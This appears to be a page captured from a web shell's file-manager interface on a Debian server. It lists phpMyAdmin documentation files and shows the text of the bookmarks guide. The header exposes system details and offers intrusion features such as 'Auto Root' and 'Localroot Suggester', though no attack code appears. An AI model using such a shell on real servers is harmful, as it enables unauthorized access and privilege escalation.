Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
phpmyadmin /
html /
_sources /
Delete
Unzip
Name
Size
Permission
Date
Action
bookmarks.rst.txt
2.41
KB
-rw-r--r--
2023-02-07 21:35
charts.rst.txt
4.63
KB
-rw-r--r--
2023-02-07 21:35
config.rst.txt
124.59
KB
-rw-r--r--
2023-02-07 21:35
copyright.rst.txt
1.58
KB
-rw-r--r--
2023-02-07 21:35
credits.rst.txt
27.36
KB
-rw-r--r--
2023-02-07 21:35
developers.rst.txt
380
B
-rw-r--r--
2023-02-07 21:35
faq.rst.txt
92.28
KB
-rw-r--r--
2023-02-07 21:35
glossary.rst.txt
14.94
KB
-rw-r--r--
2023-02-07 21:35
import_export.rst.txt
9.97
KB
-rw-r--r--
2023-02-07 21:35
index.rst.txt
573
B
-rw-r--r--
2023-02-07 21:35
intro.rst.txt
3.08
KB
-rw-r--r--
2023-02-07 21:35
other.rst.txt
916
B
-rw-r--r--
2023-02-07 21:35
privileges.rst.txt
3.22
KB
-rw-r--r--
2023-02-07 21:35
relations.rst.txt
3.26
KB
-rw-r--r--
2023-02-07 21:35
require.rst.txt
1.84
KB
-rw-r--r--
2023-02-07 21:35
security.rst.txt
4.5
KB
-rw-r--r--
2023-02-07 21:35
settings.rst.txt
1015
B
-rw-r--r--
2023-02-07 21:35
setup.rst.txt
45.06
KB
-rw-r--r--
2023-02-07 21:35
themes.rst.txt
2.87
KB
-rw-r--r--
2023-02-07 21:35
transformations.rst.txt
7.76
KB
-rw-r--r--
2023-02-07 21:35
two_factor.rst.txt
2.82
KB
-rw-r--r--
2025-04-08 15:25
user.rst.txt
195
B
-rw-r--r--
2023-02-07 21:35
vendors.rst.txt
2.25
KB
-rw-r--r--
2023-02-07 21:35
Save
Rename
.. _bookmarks: Bookmarks ========= .. note:: You need to have configured the :ref:`linked-tables` for using bookmarks feature. Storing bookmarks ----------------- Any query that is executed can be marked as a bookmark on the page where the results are displayed. You will find a button labeled :guilabel:`Bookmark this query` just at the end of the page. As soon as you have stored a bookmark, that query is linked to the database. You can now access a bookmark dropdown on each page where the query box appears on for that database. Variables inside bookmarks -------------------------- Inside a query, you can also add placeholders for variables. This is done by inserting into the query SQL comments between ``/*`` and ``*/``. The special string ``[VARIABLE{variable-number}]`` is used inside the comments. Be aware that the whole query minus the SQL comments must be valid by itself, otherwise you won't be able to store it as a bookmark. Also, note that the text 'VARIABLE' is case-sensitive. When you execute the bookmark, everything typed into the *Variables* input boxes on the query box page will replace the strings ``/*[VARIABLE{variable-number}]*/`` in your stored query. Also remember, that everything else inside the ``/*[VARIABLE{variable-number}]*/`` string for your query will remain the way it is, but will be stripped of the ``/**/`` chars. So you can use: .. code-block:: mysql /*, [VARIABLE1] AS myname */ which will be expanded to .. code-block:: mysql , VARIABLE1 as myname in your query, where VARIABLE1 is the string you entered in the Variable 1 input box. A more complex example, say you have stored this query: .. code-block:: mysql SELECT Name, Address FROM addresses WHERE 1 /* AND Name LIKE '%[VARIABLE1]%' */ If you wish to enter "phpMyAdmin" as the variable for the stored query, the full query will be: .. code-block:: mysql SELECT Name, Address FROM addresses WHERE 1 AND Name LIKE '%phpMyAdmin%' **NOTE THE ABSENCE OF SPACES** inside the ``/**/`` construct. Any spaces inserted there will be later also inserted as spaces in your query and may lead to unexpected results especially when using the variable expansion inside of a "LIKE ''" expression. Browsing a table using a bookmark --------------------------------- When a bookmark has the same name as the table, it will be used as the query when browsing this table. .. seealso:: :ref:`faqbookmark`, :ref:`faq6_22`